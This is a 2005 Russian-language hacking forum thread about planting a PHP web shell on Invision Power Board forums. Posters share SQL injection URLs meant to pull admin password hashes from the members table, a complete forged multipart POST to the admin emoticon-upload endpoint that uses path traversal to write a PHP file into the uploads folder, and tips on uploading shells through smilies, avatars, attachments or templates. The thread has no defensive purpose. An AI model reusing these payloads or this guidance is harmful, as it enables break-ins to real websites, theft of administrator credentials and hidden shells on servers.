Вопрос про заливку шелла в Invision Power Board

Discussion in 'Песочница' started by DiNo, 15 Feb 2005.

  1. DiNo

    DiNo New Member

    Joined:
    19 Jan 2005
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    как залить remview в Invision Power Board? Я прочитал статью как можно через смайлики но нифига не понял. Что можно сделать? Как можно по другому получить доступ?
     
  2. DiNo

    DiNo New Member

    Joined:
    19 Jan 2005
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Ну объясните кто нибудь.
     
  3. link

    link New Member

    Joined:
    15 Jan 2005
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    ДА блин проверки нет, кидаеш туды файл вместо смайла и все.
     
  4. (-=util=-)

    (-=util=-) Banned

    Joined:
    2 Dec 2004
    Messages:
    337
    Likes Received:
    8
    Reputations:
    2
    А где можно феньку со смайлами найти? Чегото я немогу обнаружить.... :\

    И вот я пытал ipb 1.3 final но чтото бесполезно =\

    http://[target]/forum/index.php?act=Search&nav=lv&CODE=show&searchid=[my_id]&search_in=topics&result_type=topics&hl=&st=20SELECT password FROM ibf_members WHERE name='mega_admin'/*

    и вот ещё

    http://[target]/index.php?showforum=1&prune_day=100&sort_by=Z-A&sort_key=SELECT password FROM ibf_members WHERE name='maga_admin'

    вот ёлки палки ничего неполучилось... =\
    Пытался залить shell в аватары but can't :(
     
    #4 (-=util=-), 16 Feb 2005
    Last edited: 16 Feb 2005
  5. DiNo

    DiNo New Member

    Joined:
    19 Jan 2005
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Не качается через смайлы я уже пробовал. Папка походу на запись закрыта.
     
  6. Black_Death

    Black_Death New Member

    Joined:
    16 Nov 2004
    Messages:
    26
    Likes Received:
    1
    Reputations:
    -1
    Мля ну другую папку найди...например с аватарами! Про это же несколько статей есть на античате!!!
     
  7. KEZ

    KEZ Guest

    Reputations:
    0
    Хехехе вы вместо [my_id] и других подставьте значения конкретные )))
    Эта SQL injection работает только в 2.x
    Шелл залить либо через присоединенный файл, либо через смайлы либо через
    темплейты
     
  8. (-=util=-)

    (-=util=-) Banned

    Joined:
    2 Dec 2004
    Messages:
    337
    Likes Received:
    8
    Reputations:
    2
    нет ну значения то конкретные на форуме были)))
    Вот как с смайлами что то непонятно
    Смайлы и аватары wget'ом тоже?
     
  9. DiNo

    DiNo New Member

    Joined:
    19 Jan 2005
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Вот подделанный запрос из статьи
    Code:
    POST http://someSiteForum/admin.php?adsess=7456d367b18da87d161f59424a4e96f7 HTTP/1.0
    Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
    Referer: http://someSiteForum/admin.php?adsess=7456d367b18da87d161f59424a4e96f7&act=op&code=emo
    Accept-Language: ru
    Content-Type: multipart/form-data; boundary=---------------------------7d43942c405bc
    Proxy-Connection: Keep-Alive
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
    Content-Length: 677
    Pragma: no-cache
    Cookie: member_id=1; pass_hash=cf20fc37b4g0be45c1336f29d444e798;
    
    -----------------------------7d43942c405bc
    Content-Disposition: form-data; name="adsess"
    
    7456d367b18da87d161f59424a4e96f7
    -----------------------------7d43942c405bc
    Content-Disposition: form-data; name="code"
    
    emo_upload
    -----------------------------7d43942c405bc
    Content-Disposition: form-data; name="act"
    
    op
    -----------------------------7d43942c405bc
    Content-Disposition: form-data; name="MAX_FILE_SIZE"
    
    10000000000
    -----------------------------7d43942c405bc
    Content-Disposition: form-data; name="FILE_UPLOAD"; filename="[COLOR=red]../../uploads/myFile.php[/COLOR]"
    Content-Type: application/octet-stream
    
    <% echo("Hello from injected PHP script") %>
    -----------------------------7d43942c405bc--
    Где на моем компе должен лежать remview?
    ../../uploads/myFile.php
    Я прочитал статью но нихрена не получается.
     
  10. KEZ

    KEZ Guest

    Reputations:
    0
    Неее, лутше просто залить через смайлы - если папка закрыта то неполучится...
    Но тольок при чем тут wget?
     
  11. DiNo

    DiNo New Member

    Joined:
    19 Jan 2005
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    В статье то написано что remview должен залиться в папку uploads которая всегда доступна на запись.
     
  12. KEZ

    KEZ Guest

    Reputations:
    0
    Ну почему всегда?
    Не всегда - иногда админы специально ее Chmodят )))
    но чаще всего открыта
     
  13. DiNo

    DiNo New Member

    Joined:
    19 Jan 2005
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Ну так как это сделать?
     
  14. DiNo

    DiNo New Member

    Joined:
    19 Jan 2005
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Algol помоги Plz. Ты же статью написал.
     
  15. Algol

    Algol New Member

    Joined:
    29 May 2002
    Messages:
    1,759
    Likes Received:
    4
    Reputations:
    0
    ../../uploads/myFile.php - это относительный путь к файлу, который будет создан на сервере!

    А сам текст пхп-скрипта нужно вставлять вместо этого:
    <% echo("Hello from injected PHP script") %>

    Эхххх... учите HTTP...
     
Loading...